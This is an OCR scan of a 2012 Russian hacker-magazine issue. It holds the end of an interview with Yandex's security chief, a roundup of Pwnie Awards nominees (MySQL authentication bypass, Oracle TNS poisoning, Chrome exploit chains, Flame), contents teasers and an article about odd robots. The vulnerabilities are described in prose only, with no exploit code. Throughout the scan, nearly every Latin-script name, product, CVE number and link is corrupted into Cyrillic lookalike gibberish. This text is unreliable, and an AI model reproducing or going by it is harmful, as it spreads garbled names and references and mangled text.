когда сидишь за соседними столами. 

Отбор кандидатов в Яндексе серьезный. 
Мы устраиваем жесткое техническое собесе- 
дование, в котором участвуют и сотрудники 
службы ИБ (потенциальные будущие коллеги), 
и ребята из других отделов. Лично я ис- 
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поведую подход, который принят в целом по 
компании, — лучше не нанять двух хороших 
специалистов, чем нанять одного плохого. 

Идеальный кандидат должен глубоко раз- 
бираться в операционных системах — в І_іпих 
в первую очередь. Думаю, любой из сотруд- 
ников службы ИБ Яндекса легко мог бы быть 
админом в серьезной компании, и хорошим 
админом — не начинающим. Потому что работа 
с ІІІМІХ-подобными ОС и понимание принципов 
работы высоконагруженных систем — это то, с 
чем в Яндексе сталкиваешься каждый день. 

Несмотря на разделение по направлениям, 
все весигііу-инженеры Яндекса обладают 
широким кругом знаний и умений. Разобрать- 
ся в веб-уязвимости, проверить чужой код, 
проанализировать сетевой трафик, написать 
эксплойт — все это умеет почти каждый со- 
трудник службы ИБ. 

Яндекс не похож ни на одну типовую 
большую компанию (банк или телеком). 
Поэтому нам важен и общий уровень адек- 
ватности кандидата. Далеко не все люди, 
даже те, чья грамотность нас удовлетворяет, 
смогут вписаться в команду. Ведь помимо 
технических исследований работа в службе 
И Б Яндекса — это общение с коллегами из 
других отделов и менеджмент своих проек- 
тов в рамках направления. Последний этап 
оценки кандидата — общение с ним, чтобы 
понять, сможет ли он прийтись ко двору. 

О СОВРЕМЕННОМ 
МИРЕ БЕЗОПАСНОСТИ 

Думаю, что взломы 5опу, Р5А, Сотосіо, 
І_іпкесІІп и прочих — это тенденция нашего 
времени и в будущем мы будем регулярно 
слышать про громкие инциденты. Существует 
правило Мура — но не того Мура, о котором 
все подумали. Я говорю про БЮ Мооге, автора 
Меіазріоіі, популярного инструмента для про- 



ведения пентестов. Оно звучиттак: «сазиаі 
аиаскег роѵѵег дгоѵѵз а* *Ье га*е о* Меіазріоіі». 
То есть уровень опасности атакующего рас- 
тет в зависимости отуровня продвинутости 
утилиты с большой красной кнопкой «взло- 
мать». Сильно повысился ли общий уровень 
безопасности в компаниях за эти годы? Нет. 

Вот и результат. 

В последние годы происходит сдвиг пара- 
дигмы от конечного тестирования безопасно- 
сти продукта к внедрению безопасного цикла 
разработки. То, что называется 50І_С (Зесигііу 
Оеѵеіортеп* Бйесусіе). Считается, что это снижа- 
ет стоимость конечного продукта и затраты на 
безопасность, но требует внедрения контролей 
ИБ на каждом из этапов разработки. Я говорю 
про функциональное тестирование, совмещен- 
ное с тестированием безопасности, изначаль- 
но безопасное проектирование, внедрение 
инструментов анализа исходного кода на этапах 
разработки и тому подобные вещи. Сейчас мы 
внедряем такие механизмы в Яндексе. 

В большинстве российских компаний все 
еще считается, что достаточно просто отдать 
исходный код на аудит или провести дгау Ьох 
или Ыаск Ьох тестирование. Учитывая общую 
незрелость ИБ в России, хорошо, если компа- 
ния делаетхотя бы это. Однако если занимать- 
ся безопасностью серьезно и рассматривать 
ее как стратегически важный для бизнеса 
компонент, то я, конечно, смотрел бы в сторону 
внедрения 50І_С как внутреннего процесса, а 
не каких-то конечных проверок или регулярно- 
го аудита уже сделанных вещей. 

Любая безопасность — это сначала безо- 
пасность ИТ-процессов, а потом уже бизнес- 
безопасность. Можно сколь угодно долго и 
красиво говорить про безопасность бизнес- 
процессов, но если у тебя, условно говоря, 
везде пароль «123» и не патчены клиентские 
рабочие станции, то... увы. 



Две технологии, которые, надеюсь, 
заставят компании обратить внимание на 
безопасность, — ІРѵб и НТМІ_5. Повсеместное 
их использование потребует от безопасников 
новых знаний. Все остальное, что мы видим 
сейчас, — пересказ уже знакомых историй. 

Техники атак и взлома совершенствуют- 
ся с каждым днем, но молодым пентестерам 
будет намного проще, чем было нам. С одной 
стороны, в наше время не было БЕР и А5І_П, 
но с другой стороны — не было и Меіазріоіі, 
не было такого количества книг и докумен- 
тации в интернете а-ля «стань пентестером 
за 24 часа». 

Доходит до смешного — недавно я был на 
ВІаск На* в Лас-Вегасе, там продавали видео- 
уроки по взлому с использованием Ме*азр1оШ 
Пентестинг стал гораздо проще. Кстати, это 
одна из причин, по которой я перестал за- 
ниматься техническими пентестами, — по- 
тому что это превратилось в рутину. В ответ на 
возросший спрос качество услуги ожидаемо 
понизилось, так как она стала массовой. 

Помню, как я, когда еще был пентесте- 
ром и занимался аудитом безопасности 
крупных компаний, испытывал одно разо- 
чарование за другим. Компании с большим 
именем, известные, международные... а 
внутри у них, оказывается, все очень-очень 
плохо с безопасностью. Для меня это стало 
откровением. Сейчас же я понимаю, что все 
те инциденты, которые мы наблюдаем в по- 
следнее время, происходят не из-за того, что 
компанию взломали путем какой-то очень 
сложной, невероятно продвинутой атаки. 
Такое, конечно, тоже случается, но редко. 
Просто большинство компаний не заботятся 
даже о самых базовых вещах. 

Вообще, если говорить о тестировании на 
проникновение как о механизме контроля 
безопасности, его значение в современном 
мире сильно переоценено. Многие забывают, 
что пентест служит для того, чтобы проверить 
качество внедренных контролей ИБ, а не 
подтвердить их отсутствие. К сожалению, по- 
строить правильную пирамиду контролей, как 
технических, так и организационных, намного 
сложнее. Проще позвать пентестера, а затем 
спешно заткнуть обнаруженные им дыры. 
Примерно так об информационной безопас- 
ности думает большое количество компаний, 
причем — я хочу это особенно подчеркнуть — 
далеко не только в России. 

Построить жизнеспособную систему 
управления информационной безопасностью, 
охватывающую все главные процессы в ком- 
пании, — сложная задача, для реализации 
которой требуется не один год. Однако тем она 
и интересна. Как и у большинства айтишников, 
мое сознание и мозг «находится на работе» 
круглые сутки, без выходных и праздников. 

Не понимаю тех, кто рекомендует не брать в 
отпуск телефон и ноутбук, — в отпуске часто 
работается гораздо продуктивнее :). В таком 
ритме жизни необходимо, чтобы то, чем ты 
занимаешься, было важно, масштабно и по- 
тому — интересно. □С 
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Рѵѵпіе АЩГр 5 



Кому вручили ежегодную 
премию Рмтіе АѵѵагсІз 



1і* 1і* Иг 



Шестой год подряд в конце лета объявляют номинантов на пре- 
мию Тбе Рѵѵпіе Аѵѵагсів. Это своеобразный аналог «Оскара» 
или «Грэмми», но в сфере информационной безопасности. Самые 
нашумевшие серверные и клиентские баги. Самые крышеснося- 
щие исследования в области ИБ. Самые громкие взломы и эпи- 
ческие фейлы крупных компаний. Кто получил эти награды? 



Если в мире информационной 
безопасности произошло что-то 
экстраординарное, будьуверен: 
это появится в одной из номинаций 
Рѵѵпіе Аѵѵагсіз. Здесь выставляют 
для награды самые серьезные 
исследования, которые называют 
«госкеі зсіепсе». И здесь же стебут- 
ся над самыми нелепыми и эпиче- 
скими провалами крупных компа- 
ний. Номинанты известны заранее, 
а объявляют победителей в рамках 
конференции ВІаск На*. 



Лучш ий серверный баг 

Условия простые: в этой категории номинируются уязвимости 
в серверном софте. Неважно каком — главное, что эти приложения 
доступны удаленно и не требуют взаимодействия с пользователем. 






«МЫ УЖЕ ТАМ?» 

ОБХОД АВТОРИЗАЦИИ В МѴ50І_ (СѴЕ-201 2-21 22) 

Сергей Голубчик 

ЬіІ.Іѵ/КиІВдд 

Есть такой анекдот: «После миллиардной попытки взлома китай- 
скими хакерами сервер Пентагона таки согласился, что его пароль 
„Мао Цзэдун"». И он отлично характеризует этот баг: если очень 
долго пытаться авторизоваться на сервере Му5(0І_ под аккаунтом 



существующего пользователя (скажем, гооі), то после некоторой 
попытки это удается! Эксплойт в буквальном смысле делает запро- 
сы: «Могу я сейчас залогиниться под гооі?», «А сейчас?», «Быть 
может, сейчас?». И после некоторой итерации Му50І_ авторизует 
пользователя, даже с неправильным паролем. Круто? Не то слово. 



ОТРАВЛЕНИЕ ТИБ-СЕРВИСА (СѴЕ-201 2-1 675) 

Джоксен Корет 

Ы1.1у/172УЬ 

Слезы подступили к глазам, когда светувидела уязвимость в ТІ\І5 
Бізіепег — одном из важных сервисов Огасіе. Эксплуатация, 
которую реализовал исследователь, представляет собой дитя 
запретной любви между отравлением йІМЗ-кеша и классическими 
уязвимостями, присущими ТІ\І5 Ызіепег. В результате — полно- 
ценная МІТМ-атака на подключения к БД из интернета. Если 
вспомнить, какого размаха компании используют Огасіе и какого 
плана данные в них хранят, становится особенно страшно. За- 



030 



ХАКЕР 10/165/2012 



Лучшее за 2012 год: уязвимости, сплоиты, исследования, фейлы 



бавно, что баг существует аж 13 лет, а Огасіе пофиксила его спустя 
четыре года с того момента, когда ей о нем сообщили. 



УЯЗВИМОСТЬ ІІ5Е-АРТЕК-РКЕЕ В РКОРТРй (СѴЕ-201 1 -41 30) 
Апопутоиз 

Ы1.1у/Р4ТЕЭх 

Кто сказал, что уязвимости типа изе-аІТег-Ітее существуют только 
в браузерах? Последние и правда все больше хотят монополи- 
зировать этот класс багов! Не дадим им это сделать :). Данная 
уязвимость изе-аіТег-ітее позволяет исполнить произвольный 
код на удаленной системе не через браузер, а через один из самых 
распространенных РТР-серверов — РгоРТРй! Немного печалит, 
что это розі-аиіб уязвимость, то есть для ее эксплуатации не- 
обходима правильная учетная запись. Но все же мечты сбылись, 
по крайней мере — мечты хакеров. 



6агД яя повышения привилегий 



Награда присуждается человеку, который обнаружил и смог про- 
эксплуатировать наиболее технически сложную и интересную 
уязвимость для повышения привилегий. Чем больше набирают 
оборот защитные механизмы вроде виртуализации или мандат- 
ного управления доступом, тем большее значение приобретает 
этоттип уязвимости. Особенно ценятся возможности для локаль- 
ного повышений привилегий в системе, выхода из песочницы 
и пространства виртуальной машины. 



ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В ХЕН ШТЕІ_ Х64 (СѴЕ-201 2-0217) 
Рафаль Войтчук 

Ыі.Іѵ/КЕТІіКЬ и Ьіиѵ/МООѵѵБО 

Похоже, что инструкции 5Ѵ5РЕТ на Іпіеі х64 работают немного ина- 
че (некоторые люди также уточняют — неправильно), нежели это 
предусматривает стандарт АМР х86_64. Операционная система, 
написанная по спецификации от АМА и запущенная на процессоре 
Іпіеі, включает в себя умопомрачительный бонус — возможность 
повышения привилегий. Уязвимыми, к примеру, считаются 64-бит- 
ные версии ІЧеіВЗО, РгееВЗР и ѴѴіпсІоѵѵз 7. 



ПЕРЕПОЛНЕНИЕ ШТЕСЕК В 105 НРБ (СѴЕ-201 2-0642) 
росІ2д 

ЬіІ.Іѵ/ОеХсІМР 

Эта уязвимость легла в основу джейлбрейка АЬзіпіЬе для ЮБ 
5. 0/5.1, который позволил получить полный доступ к системе мил- 
лионам іРбопе-пользователей. Хитрость заключается в создании 
произвольного файла со специальным именем в каталоге образа 
НР5-диска, в результате чего происходит переполнение буфера 
и выполнение произвольного кода с повышением прав. 



М511-098: УЯЗВИМОСТЬ В ОБРАБОТЧИКЕ ИСКЛЮЧЕНИЙ ^ 

ѴѴШ00ѴѴ5 КЕРІМЕІ- (СѴЕ-201 1 -201 8) 

Матеуш «І00ги» Юрчик ѵшыек 

ЫЫу/ЫсиТдп 

Исследователь с незатейливым ником ) 0 0 г и сумел похакать винду. 
Все версии сразу — вернее все 32-битные билды ѴѴіпсІоѵѵз, начи- 
ная от І\ІТ и заканчивая ѴѴіпсІоѵѵз 8 йеѵеіорег Ргеѵіеѵѵ. В результате 
атакующий мог выполнить произвольный код с привилегиями 
5У5ТЕМ. Что особенно круто, автор опубликовал подробнейшее 
исследование об этой уязвимости. 



СаМ ое инновационное исследование 



Премия вручается людям, опубликовавшим наиболее интересные 
и новаторские исследования в печатном виде, в виде презента- 
ций, готовой для использования утилиты или даже поста в таіі- 
листе. 



ЭКСПЕРИМЕНТЫ ПО АНАЛИЗУ ВОЗМОЖНЫХ 
АТАК НА ЭЛЕКТРОНИКУ АВТОМОБИЛЕЙ 
Стивен Чековэй и др. 

ЬіІ.Іѵ/гРРЗиІ 

Последнее время многие хакеры часто жалуются на то, что трава 
менее зеленая, небо совсем не голубое, а ошибки переполнения 
буфера канули в Лету, оставив в нашей памяти лишь свой при- 
ятный ванильный запах. Оказывается, на самом деле они никуда 
и не пропадали, а просто перекочевали в автомобили! Стивен и его 
команда бравых исследователей накопали тьму таких переполне- 
ний и проэксплуатировали их с помощью Сй-болванки, устройств 
ВІиеІооЛі и телефонного звонка на 05М-номер, встроенный в авто 
для удобства и безопасности водителя. Аррр, чертовски крутые 
перцы! Ты только представь! Позвонили автомобилю и затрояни- 
ли его! С таким раскладом будущее — весьма опасная история. 

Так что теперь, наверное, будем реже пользоваться компьютерами. 
И телефонами тоже. 



ПАКЕТЫ В ПАКЕТАХ: НИЗКОУРОВНЕВЫЕ АТАКИ ^ 

НА СОВРЕМЕННЫЕ РАДИОТЕХНОЛОГИИ 

Трэвис Гудспид ѴШНЕК 

Ыі.Іѵ/І.Х9тУѵ 

Ни для кого не секрет, что в цифровом радиовещании существу- 
ют помехи. Суть и основная идея исследования Трэвиса — такие 
помехи не только неприятны, но и могут быть опасны для пользо- 
вателя. При использовании технологии РаскеІз-іп-РаскеІз помехи 
могут превратить безопасный пакет, передаваемый по радио- 
каналу, во вредоносный, что позволит злоумышленнику внедрить 
фреймы на физическом уровне без использования радио. И все не 
так просто — уязвимость закралась не в само ПО, а в аппаратное 
обеспечение. 



5МА5НШ6ТНЕАТ0М 
Тарьей Мандт 

ЬіІ.Іѵ/ТХтіМЗ 

Не перестаем удивляться, что же сделало такого плохого ядро 
ѴѴіпсІоѵѵз, что отношения с товарищем Тарьей у них в последние 
годы совсем не заладились? Тарьей — обращаемся к тебе: «Раз- 
ве ты еще не до конца его уничтожил?» Видимо, еще нет. Автор 
номинировался с огромным исследованием о весьма необычных 
багах ѴѴіпсІоѵѵз. 



ИНЪЕКЦИЯ ПРОИЗВОЛЬНОЙ НАГРУЗКИ 
В ИСПОЛНЯЕМЫЙ ФАЙЛ ѴѴШ00ѴѴ5 С ЦИФРОВОЙ ПОДПИСЬЮ 
Игорь Глуксман 

ьи.іѵ/могэио 

Ошибки, связанные с исполнением неподписанного кода, юза- 
бельны не только для джейлбрейка смартфонов: помимо этого, 
они еще могут пригодиться для добавления полезной нагрузки 
в подписанные приложения. Кактебе идея добавить свой кусочек, 
скажем, в инсталляторы или апдейтеры без нарушения их цифро- 
вой подписи? 
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С0ѴЕР5Т0КѴ 



Самый эпичный фейл 



Иногда ты выкладываешься на все 110%, но от этого твой фейл 
становится еще более смачным. И зачем был бы нужен интернет, 
если бы в нем не был задокументирован самый громкий фейл всех 
времен и народов? Эта награда присуждается лицу или компании, 
потерпевшей (-ему) самый яркий еріс {аіі. 



тнЕАМті-ѵікизшоизткѵ 

Антивирусная индустрия, мы вам правда нужны, да? 



БОТНЕТ НЕКРЕЗИЕТ 
Франческо Помпо (ака Ргк7) 

Ы1.1 у/К 8)УА5 

Даже ботоводам необходимо следить за безопасностью своих 
ресурсов, использовать надежные пароли, делать аудит своего 
РНР-кода, не допускать утечки информации в поисковики. Мастер 
ботнета Негрез серьезно пренебрег всеми вышеперечисленными 
пунктами, чем и воспользовались ребята с таіѵѵаге.іи, получив 
контроль над ботнетом и полностью раскрыв личность бот- 
мастера. 



УТЕЧКА И ВЗЛОМ 6 МИЛЛИОНОВ ХЕШЕЙ ПАРОЛЕЙ І.ШКЕОШ 
ЫпкесНп 

пѵІі.тз/І-дІЬѴР 

У кого 2500 сотрудников и около 90 миллионов пользователей, 
но он не солит пароли и не имеет в штате такой позиции, как руко- 
водитель отдела информационной безопасности? Теперь мы все 
знаем: это ЫпкесНп. 



СТАТИЧЕСКИЙ 55Н-КЛЮЧ ДЛЯ КООТ В ДЕВАЙСАХ Р5 
Р5 Иеіѵѵогкз 

ЬіЫѵ/ЫДзВЗи 

Как круче всего может облажаться производитель сетевого обору- 
дования? К примеру, вместе с публичным ключом гооТа для под- 
ключения через 55Н (что хорошо и удобно) добавить в прошивку 
еще и приватный ключ, который кто угодно может вытащить 
и получить полный доступ к любому устройству! Кто так отличил- 
ся? Малоизвестный в России, но довольно авторитетный в мире 
производитель сетевого оборудования Р5. 



%> 




Лучши й клиентский баг 

Приз вручается человеку, который открыл или проэксплуатировал 
наиболее интересный клиентский баг. Сегодняшняя реальность 
такова, что слово «клиент» — это в значительной степени синоним 
слова «браузер». Но все-таки не стоит забывать, что «клиент» — 
это и всевозможные медиаплееры с кучей целочисленных пере- 
полнений на борту. 



ВЫПОЛНЕНИЕ КОДА В СНКОМЕ 
РіпкіеРіе 

Ыиу/М|Т1)тк 

Этот исследователь, по мнению судий Рѵѵпіе, совершил под- 
виг — чтобы выполнить произвольный код на удаленной системе, 
он проэксплуатировал цепочку из шести уязвимостей, которые 
предварительно обнаружил. Когда читаешь описание этой фан- 
тастической техники, волосы встают дыбом: вот что называется 
«госкеі зсіепсе». В награду исследователь получил 60 000 дол- 
ларов и победу в конкурсе Ооодіе Рѵѵпіит в рамках конференции 
СапБесѴѴезі! К слову, ребята из Ооодіе проявили чудеса оператив- 
ности, и в течение 24 часов все уязвимости были закрыты. 



%> 

ѴШЫЕК 



ЕЩЕ ОДНО ВЫПОЛНЕНИЕ КОДА В СНРОМЕ 
Сергей Глазунов 

ЬИ.1у/1.тК01р 

Мы думаем, что сплоит от нашего соотечественника намного круче! 
Для выполнения удаленного кода в СЬготе было найдено и исполь- 
зовано как минимум 14 различных уязвимостей. Почему как мини- 
мум? После 14 команда СЬготе Зесигііу сбилась со счета (цифры — 
сложная штука). Будем надеяться, что Сергей когда-нибудь получит 
премию. И еще больше верим, что расскажет на наших страницах, 
как ему удается выгребать пачки багов из кода СЬготе'а. 



% 

ѴШЫЕК 



М511 -087: УДАЛЕННОЕ ВЫПОЛНЕНИЕ КОДА В ѴѴІИООѴѴБ (СѴЕ-201 1-3402) 
Авторы йияи 

Ьіиѵ/РѴѴхЬо5 

Авторы сетевого червя Оици, который уже успели прозвать «Зіихпеі 
2: Еіесігіс Оициіоо», нашли (нашли ли?) и использовали уязвимость 
ядра, позволяющую поработить ѴѴіпсІоѵѵз любой версии! И все это 
из-за какой-то неправильной обработки шрифта, используемого на 
веб-странице. А что еще нужно от сііепі-зісіе уязвимости? Печеньки? 



РАСКРЫТИЕ ИНФОРМАЦИИ ЧЕРЕЗ РІ_А5Н (СѴЕ-201 2-0769) 

Фермин Серна 

ЫЦу/НУУКЬпр 

Этот американский исследователь продемонстрировал и в под- 
робностях описал, как раскрутить какую-то ошибку чтения памяти 
в РІазЬ'овой функции ВіІтарОаІа.ЫзІодгатО до чтения произвольно- 
го участка памяти (то есть по любому адресу). Было продемонстриро- 
вано, как вообще можно манипулировать данными кучи в подобных 
случаях и как, используя творческий подход, развить вектор подоб- 
ных атак. Обидно только, что РІазЬ используют все реже и реже. 



ОБХОД ЦИФРОВОЙ ПОДПИСИ В 105 (СѴЕ-201 1 -3442) 

Чарли Миллер 

Ыиѵ/5х35пѵ 

Чарли Миллер, небезызвестный исследователь с мировым име- 
нем, обнаружил интересный баг в ІОБ, позволяющий зловредному 
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Лучшее за 2012 год: уязвимости, сплоиты, исследования, фейлы 



приложению скачивать и выполнять произвольный и неподписан- 
ный код. Арріе должным образом проверяет функциональность 
каждого приложения, прежде чем оно попадает в Арр Зіоге. Од- 
нако Чарли удалось воспользоваться уязвимостью и реализовать 
в приложении возможность удаленно загрузить код для выполне- 
ния на устройстве (это уже не могут проверить спецы Арріе). Ргоо^- 
о(-сопсерІ был принят для распространения в Арр Зіоге. К сожа- 
лению, прежде чем Чарли смог применить на практике этот метод, 
он рассказал о нем прессе. Арріе, не заставив себя долго ждать, 
выпилила все приложения Чарли из Арр Зіоге, а также и из его 
іРЬопе. К слову, Чарли был единственным пользователем своего 
приложения. Пригрозив настучать по голове, Арріе отстранила 
Чарли от статуса разработчика Ю5-приложений на год, тем самым 
«обезопасив» себя. 



Еріс Оѵѵпаде 

Премия Еріс Оѵѵпаде присуждается хакерам, ответственным 
за самые разрушительные, за самые широко известные или же 
просто за самые ржачные взломы. Также награды могутудосто- 
иться и исследователи, ответственные за раскрытие уязвимостей 
или эксплойтов, которые породили в Сети огромное количество 
специальных баллов оѵѵѵѵ'ов (а именно так учредители конкурса 
измеряют степень Оѵѵпаде). 



«РІ.АМЕ» АТАКА НА ѴѴШ00ѴѴ5 ИРРАТЕ ЧЕРЕЗ М05-К0ЛЛИЗИЮ 
Авторы ГІате 

Любая атака, использующая бреши криптоалгоритмов, достойна 
уважения. Возможность таким образом поработить любую тачку 
с виндой на борту средствами ѴѴіпсІоѵѵз Іірсіаіе — реально массо- 
вый Оѵѵпаде. 



ЦЕНТРЫ СЕРТИФИКАЦИИ 551 
Все на свете 

Оказывается, что сами СА (СегІіЛсаІе АиЛіопЛез) — одна большая 
уязвимость. Сколько еще необходимо поиметь центров сертифика- 
ции, чтобы доказать, что позволять выдачу групповых сертифика- 
тов непрофильными компаниями — плохая идея? 






І05МІІ.ВРЕАК5 

Разработчики іРІіопе и СИгопіс ѵѵшнек 

Конечно же, все мы любим джейлбрейки. Ребята отказыва- 
ются от своих приватных эксплойтов только ради того, чтобы 
миллионы пользователей по всему миру смогли установить 
себе программу из неофициального репозитория. И с каждым 
релизом нового І05 им приходится прощаться со своими 0-сіау- 
сплоитами. 






Премия вручается производителям, которые хуже всех справи- 
лись с уязвимостями в своих системах безопасности и наиболее 
эффектно сели в лужу. В этом году номинанты и победители 
озвучены не были. Нам остается только гадать, вариантов 
много :). 




Лучшая песня 

На какой церемонии нет номинации «Лучшая песня»? Хакеры, пи- 
шущие песни и рэп (пародийный и оригинальный), — это на удив- 
ление старая традиция. 

На прошедших Рѵѵпіез удалось заставить НО и Наіѵаг читать 
рэп! Кстати, обязательное правило участия — все песни должны 
быть представлены в аудиоформате. 



ѴѴНАТ У(Ш МЕЕй МЕТА5РЮІТ! 

Марко Фигероа 

ЬіЫѵ/ОоЦОКЗ 

Марко передает всем привет из Нью-Йорка, зачитывая свою теле- 
гу про полезность Меіазріоіі в обиходе, да и в быту в принципе. 



о іл ореолов 
іты 

Ыі.Іѵ/06Іі56ѵ 

Зачитка про нелегкий процесс взлома систем и бесконечного 
стремления к максимальным привилегиям в системе. 



сискмЕ 

ТНе II ѴѴ С5Е ВапсІ 

ЬіІ.Іѵ/РІдрѵО 

Отличная пародия на «2отЬіе» от «ТЬе СгапЬеггіез» о распростра- 
нении малвари по сетям. Прямо ностальгию навеивают по бессон- 
ным ночам и сэмплам аудиобиблиотек РазсаІ из динамиков. 



6ІѴЕІТ50МЕ5АИ 

ЬеергаЬидзІар.сот 

ьи.1у/ыупоы 

Утечки ЫпкесІІп + 8-ЬіІ, и добавить нечего. 



СОМТКОІ- 
ОиаІ Соге 



* 

ѴѴІЫЫЕР 



ЫЫѵ/МЛЖиА 

Эдакий курс «Социальная инженерия», совместили приятное с по- 
лезным. Ребята утверждают, что каждое прослушивание увеличи- 
вает значимость твоего статуса исследователя. 
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27211 

участников 



ІѵѵгНегІ 

11568 

фолловеров 





30 страниц на одной полосе. 
Тизер некоторых статей. 



Ргеѵіехл/ 



РС20ЫЕ 



44 



ѴШ00ѴѴ580Е5КТ0РЕ0ІТКЖ 

Исторически сложилось, что все разго- 
воры о ѴѴіпсІоѵѵз 8 сводятся кобсуждению 
планшетов и Меіго. Признаемся, «визу- 
альный лоск»намтожеедва не вскружил 
голову. Стилистика интерфейса Меіго 
вновойОСотМісгоБОЙпонравиласьнам 
настолько, что мы оформили в ней целую 
статью. Одна ко вовремя опомнились — 
аестьли в«восьмерке»хоть что-то, кроме 
красивостей? 

В итоге мы попыталисьсделать 
то, что, похоже, забыли сделать в Ред- 
монде, — взглянутьна происходящее 
глазами несферического пользователя 
ѴѴіпсІоѵѵз-планшета в вакууме, а вполне 
реального десктопного юзера. А стоит л и 
емуобновляться? 



■ц ѴѴіпсІоѵѵз 8 

РЕ5КТОР ЕОІТІОЫ 



РС20ЫЕ 



РНКЕАКІН6 
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НЕСЧЕСТЬУРОБОТАПРОФЕССИЙ 

У некоторых из вас в детстве наверняка 
была эта книга, полная рассказов о робо- 
тах в промышленности, обслуживании 
идажевкино. Развиваемэтутему — 
поговорим о бесполезных роботах. 
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ВІТСОІИ: НОВОЕ ЦИФРОВОЕ ЗОЛОТО? 

«Яхочузойото!» — говорил ребенок в не- 
давней ТВ-рекламе по случаю Олимпиа- 
ды. Хакерытоже хотят — но свое особен- 
ное, с хешами и анонимное. Узнай все об 
электронной валюте нового поколения! 
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5ТМ32 ДЛЯ ЗВУЧНОГО ГАДЖЕТА 

Долгожданное возвращение 
рубрики РИгеакіпдІУчимся пилить 
микроконтроллер под свои нужды и 
получаем собственный клон іРос! ТоисН. 



ВЗЛОМ 



МАШАКЕ 






АППАРАТНАЯ МАЛВАРЬ 




ПОЛИМОРФНЫЙ, ДЕРЗКИЙ ИЖИВУЧИИ 
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Продолжаем разговор отехниках взлома, 
направленных на слабые места вжелезе 
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Старый добрый вирус нетеряет 
актуальности на протяжении девяти 


92 



жертвы. В прошлый раз говорили об 
эксплойтах, а теперь в центре внимания 
оказалисьбуткиты ЕѵіІСоге и РакзЬаза. 



лет — померкам ІТ это просто вечность. 
Эта статья познакомиттебя сбогатой 
и длинной историей Заігіу. 



МАЛВАРЩИКИ ПРОТИВ РАТСНОЦАКО 

Технология защиты ядра ѴѴіпсІоѵѵз от 
модификаций дает редкий повод похва- 
лить М іеговой за достижение в области 
безопасности. Однако это не помешал о 
нам попробоватьфичуназуб... 
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Мария «МИгіІІ» Нефедова (ті!гЙІ(ЭгеаІ. хакер. ги) 



ОБЗОР САМЫХ НЕОБЫЧНЫХ РОБОТОВ 



НЕ СЧЕСТЬ 
У РОБОТА,, 
ПРОФЕССИИ 




В нашей жизни год от года становится все больше роботов. Некоторые из них просты и берут на себя 
элементарные функции — скажем, робот-пылесос; другие куда сложнее, и на их разработку у лучших 
умов планеты уходят годы — например, роботы — ассистенты хирургов. Но порой на свет появляются 
непонятные, прикольные или просто безумные роботы. Представляем твоему вниманию небольшую 
подборку самых странных и бесполезных (возможно, только на первый взгляд) электронных друзей 
человека. Попробуем понять, кто, как и зачем их создает. 
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Не счесть у робота профессий 



ПИНГ-ПОНГ С КВАДРОКОПТЕРОМ 



Миниатюрные квадрокоптеры сами по себе 
штука весьма забавная, и ты наверняка слы- 
шал об АР.йгопе, которым можно управлять 
при помощи смартфона. Но если для кого-то 
подобные гаджеты лишь игрушка, то для дру- 
гих — повод хорошо поломать голову. 

Так, ученые из Калифорнийского универ- 
ситета в Беркли достаточно давно работают 
над созданием собственного ПО для ква- 
дрокоптеров. Основная его задача — опе- 



ративный расчет траектории полета самого 
аппарата и различных объектов, которые 
робот фиксирует своими камерами. В ходе ра- 
боты была создана технология, получившая 
имя 1_ВМРС (Беагпіпд ВавесІ МосІеІ РгесІ ісііѵе 
Сопігоі), что можно перевести как «самообу- 
чающаяся модель предиктивного управле- 
ния». Благодаря этой технологии летающие 
роботы «научились» с высокой точностью 
просчитывать траекторию полета брошенного 



предмета, например шарика для пинг-понга. 
ѵоиіи.Ье/сІІ. 2В5ѵ1_ХШ — этот ролик демон- 
стрирует, что расчетом траектории дело 
не ограничилось и квадрокоптеры успешно 
ловят шарики для настольного тенниса. 

Кстати, похожую штуку разработали и ин- 
женеры Швейцарской высшей технической 
школы Цюриха. Эти ребята вообще научили 
квадрокоптеры играть в пинг-понг друг с дру- 
гом, установив на них ракетки. 





ЧЕЛОВЕКОПОДОБНЫЙ 
БОЕВОЙ РОБОТ К1ЛША5 



Хорошая новость для всех поклонников мехов, аниме 
и просто огромных человекоподобных боевых робо- 
тов — они уже здесь и их даже можно купить (правда, 
для этого нужно быть миллионером). Конечно, разра- 
ботать такую штуку могли только японцы. Ответствен- 
ность за создание робота Кигаіаз лежит на компании 
БиісІоЬазЫ Неаѵу Іпсіизігу ( биібоЬазЬуико.Ір ). 

Кигаіаз — это 4,4 тонны металла, четыре метра 
«роста» и более тридцати гидравлических сочленений 
на дизельном ходу. Все это счастье способно раз- 
вивать скорость до 10 километров в час, а управлять 
им можно как из кабины пилота, так и удаленно, при 
помощи смартфона. 

Робот вооружен двумя ракетницами и двумя ротор- 
ными пулеметами, которые стреляют игрушечными 
пулями. Ракетницы тоже более-менее настоящие, они 
даже могут стрелять фейерверками или бутылками 
с водой (неполными, чтобы случайно не нанести нико- 
му увечий). Управление «оружием» реализовано про- 
сто замечательно: пулеметы начинают раскручиваться 
и имитируют стрельбу в тот момент, когда водитель 
робота улыбается. 

Самое же интересное в том, что Кигаіаз — не просто 
красивый концепт. Заказать робота уже можно, только 
цена кусается — обойдется такая игрушка примерно 
в 1,35 миллиона долларов. 
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РС20ЫЕ 



НЕКОТОРЫМ ЛЮДЯМ ОТЧАЯННО 
ХОЧЕТСЯ СДЕЛАТЬ ПРОСТОЕ 
СЛОЖНЫМ И ДОБАВИТЬ ОБЫЧНЫМ 
ВЕЩАМ ЧЕГО-НИБУДЬ ЭТАКОГО 




МЫ КЕЯ — ЧЕМПИОН В ИГРЕ 
«КАМЕНЬ, НОЖНИЦЫ, БУМАГА» 



От пугающего Кигаіаз перейдем к более повседневным 
и менее экзотичным вещам. Еще одна разработка японских 
ученых (похоже, эти парни куда круче всемирно известных 
британских ученых) — робот Эапкеп, способный в 100% слу- 
чаев обыграть человека в игре «камень, ножницы, бумага». 

Построили эту роботизированную руку инженеры из ис- 
следовательской лаборатории ІзЬікаѵѵа-Оки, совместив 
систему машинного зрения и высокоскоростного робота. 
Эапкеп анализирует положение и форму человеческой руки — 
угол поворота кисти, движение пальцев. Чтобы определить, 
«камень», «ножницы» или «бумагу» покажет человек, роботу 
требуется всего одна миллисекунда! После этого Эапкеп ав- 
томатически показывает выигрышное положение руки. Этот 
эффект достигается благодаря встроенной высокоскоростной 
камере. Человек просто не способен успеть быстрее робота. 

Конечно, построили Эапкеп не шутки ради: подобные 
системы взаимодействия между человеком и машиной 
могут помочь в создании роботизированных интерфейсов 
управления движением для инвалидов. 



РОБОТ-ПЫЛЕСОС 
НЕГО ШІТТЕК 



